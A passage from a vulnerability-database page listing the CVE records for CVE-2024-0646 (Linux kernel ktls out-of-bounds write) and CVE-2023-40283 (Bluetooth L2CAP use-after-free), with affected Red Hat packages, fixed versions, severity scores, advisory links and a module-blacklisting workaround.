"version": "0:5.14.0-284.52.1.rt14.337.el9_2",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_eus:9.2::baseos"
],
"defaultStatus": "unaffected",
"packageName": "kpatch-patch",
"product": "Red Hat Enterprise Linux 9.2 Extended Update Support",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhev_hypervisor:4.4::el8",
"cpe:/o:redhat:rhel_eus:8.6::baseos",
"cpe:/a:redhat:rhel_eus:8.6::crb"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Virtualization 4 for Red Hat Enterprise Linux 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-372.91.1.el8_6",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/cluster-logging-operator-bundle",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.8.6-22",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/cluster-logging-rhel9-operator",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.8.6-11",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/elasticsearch6-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v6.8.1-407",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/elasticsearch-operator-bundle",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.8.6-19",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/elasticsearch-proxy-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v1.0.0-479",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/elasticsearch-rhel9-operator",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.8.6-7",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/eventrouter-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v0.4.0-247",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/fluentd-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.8.6-5",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/log-file-metric-exporter-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v1.1.0-227",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/logging-curator5-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.8.1-470",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/logging-loki-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v2.9.6-14",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/logging-view-plugin-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.8.6-2",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/loki-operator-bundle",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.8.6-24",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/loki-rhel9-operator",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.8.6-10",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/lokistack-gateway-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v0.1.0-525",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/opa-openshift-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v0.1.0-224",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/vector-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v0.28.1-56",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:6"
],
"defaultStatus": "unaffected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 6",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:7"
],
"defaultStatus": "unaffected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 7",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:7"
],
"defaultStatus": "unaffected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 7",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:9"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat"
}
],
"datePublic": "2023-12-07T06:30:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "An out-of-bounds memory write flaw was found in the Linux kernel\u2019s Transport Layer Security functionality in how a user calls a function splice with a ktls socket as the destination. This flaw allows a local user to crash or potentially escalate their privileges on the system."
}
],
"metrics": [
{
"other": {
"content": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"value": "Important"
},
"type": "Red Hat severity rating"
}
},
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-787",
"description": "Out-of-bounds Write",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-10-09T11:52:53.605Z",
"orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"shortName": "redhat"
},
"references": [
{
"name": "RHSA-2024:0723",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0723"
},
{
"name": "RHSA-2024:0724",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0724"
},
{
"name": "RHSA-2024:0725",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0725"
},
{
"name": "RHSA-2024:0850",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0850"
},
{
"name": "RHSA-2024:0851",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0851"
},
{
"name": "RHSA-2024:0876",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0876"
},
{
"name": "RHSA-2024:0881",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0881"
},
{
"name": "RHSA-2024:0897",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0897"
},
{
"name": "RHSA-2024:1248",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1248"
},
{
"name": "RHSA-2024:1250",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1250"
},
{
"name": "RHSA-2024:1251",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1251"
},
{
"name": "RHSA-2024:1253",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1253"
},
{
"name": "RHSA-2024:1268",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1268"
},
{
"name": "RHSA-2024:1269",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1269"
},
{
"name": "RHSA-2024:1278",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1278"
},
{
"name": "RHSA-2024:1306",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1306"
},
{
"name": "RHSA-2024:1367",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1367"
},
{
"name": "RHSA-2024:1368",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1368"
},
{
"name": "RHSA-2024:1377",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1377"
},
{
"name": "RHSA-2024:1382",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1382"
},
{
"name": "RHSA-2024:1404",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1404"
},
{
"name": "RHSA-2024:2094",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:2094"
},
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/security/cve/CVE-2024-0646"
},
{
"name": "RHBZ#2253908",
"tags": [
"issue-tracking",
"x_refsource_REDHAT"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2253908"
},
{
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=c5a595000e267"
}
],
"timeline": [
{
"lang": "en",
"time": "2024-01-17T00:00:00+00:00",
"value": "Reported to Red Hat."
},
{
"lang": "en",
"time": "2023-12-07T06:30:00+00:00",
"value": "Made public."
}
],
"title": "Kernel: ktls overwrites readonly memory pages when using function splice with a ktls socket as destination",
"workarounds": [
{
"lang": "en",
"value": "To mitigate this issue, prevent module tls from being loaded. Please see https://access.redhat.com/solutions/41278 for how to blacklist a kernel module to prevent it from loading automatically."
}
],
"x_redhatCweChain": "CWE-787: Out-of-bounds Write"
}
},
"cveMetadata": {
"assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"assignerShortName": "redhat",
"cveId": "CVE-2024-0646",
"datePublished": "2024-01-17T15:16:45.148Z",
"dateReserved": "2024-01-17T13:11:12.669Z",
"dateUpdated": "2025-10-09T11:52:53.605Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-40283 (GCVE-0-2023-40283)
Vulnerability from cvelistv5
Published
2023-08-14 00:00
Modified
2024-08-02 18:31
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
An issue was discovered in l2cap_sock_release in net/bluetooth/l2cap_sock.c in the Linux kernel before 6.4.10. There is a use-after-free because the children of an sk are mishandled.
References
| URL | Tags | |||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T18:31:53.261Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=1728137b33c00d5a2b5110ed7aafb42e7c32e4a1"
},
{
"tags": [
"x_transferred"
],
"url": "https://github.com/torvalds/linux/commit/1728137b33c00d5a2b5110ed7aafb42e7c32e4a1"
},
{
"tags": [
"x_transferred"
],
"url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.4.10"
},
{
"name": "DSA-5480",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://www.debian.org/security/2023/dsa-5480"
},
{
"name": "DSA-5492",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://www.debian.org/security/2023/dsa-5492"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/175072/Kernel-Live-Patch-Security-Notice-LSN-0098-1.html"
},
{
"name": "[debian-lts-announce] 20231019 [SECURITY] [DLA 3623-1] linux-5.10 security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://security.netapp.com/advisory/ntap-20231020-0007/"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/175963/Kernel-Live-Patch-Security-Notice-LSN-0099-1.html"
},
{
"name": "[debian-lts-announce] 20240111 [SECURITY] [DLA 3710-1] linux security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "An issue was discovered in l2cap_sock_release in net/bluetooth/l2cap_sock.c in the Linux kernel before 6.4.10. There is a use-after-free because the children of an sk are mishandled."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-01-11T19:07:21.176099",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=1728137b33c00d5a2b5110ed7aafb42e7c32e4a1"
},
{
"url": "https://github.com/torvalds/linux/commit/1728137b33c00d5a2b5110ed7aafb42e7c32e4a1"
},
{
"url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.4.10"
},
{
"name": "DSA-5480",
"tags": [
"vendor-advisory"
],
"url": "https://www.debian.org/security/2023/dsa-5480"
},
{
"name": "DSA-5492",
"tags": [
"vendor-advisory"
],
"url": "https://www.debian.org/security/2023/dsa-5492"
},
{
"url": "http://packetstormsecurity.com/files/175072/Kernel-Live-Patch-Security-Notice-LSN-0098-1.html"
},
{
"name": "[debian-lts-announce] 20231019 [SECURITY] [DLA 3623-1] linux-5.10 security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html"
},
{
"url": "https://security.netapp.com/advisory/ntap-20231020-0007/"
},
{
"url": "http://packetstormsecurity.com/files/175963/Kernel-Live-Patch-Security-Notice-LSN-0099-1.html"
},
{
"name": "[debian-lts-announce] 20240111 [SECURITY] [DLA 3710-1] linux security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2023-40283",
"datePublished": "2023-08-14T00:00:00",
"dateReserved": "2023-08-14T00:00:00",
"dateUpdated": "2024-08-02T18:31:53.261Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.
Loading…
Loading…